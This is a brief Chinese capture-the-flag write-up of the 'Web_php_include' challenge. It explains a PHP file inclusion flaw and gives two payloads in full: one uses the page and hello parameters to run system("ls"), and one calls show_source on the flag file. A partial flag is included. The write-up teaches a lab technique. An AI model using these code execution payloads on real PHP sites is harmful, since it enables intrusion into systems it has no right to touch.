攻防世界web进阶区之Web_php_include

代码审计后我们会发现存在文件包含漏洞。 借助hello参数构建payload:?page=http://127.0.0.1/index.php/?hello=<?system("ls")?>然后借助参数?page=http://127.0.0.1/index.php/?hello=<?show_source("fl4gisisish3r3.php");?>即可得到flag ctf{876a5fca
相关文章
相关标签/搜索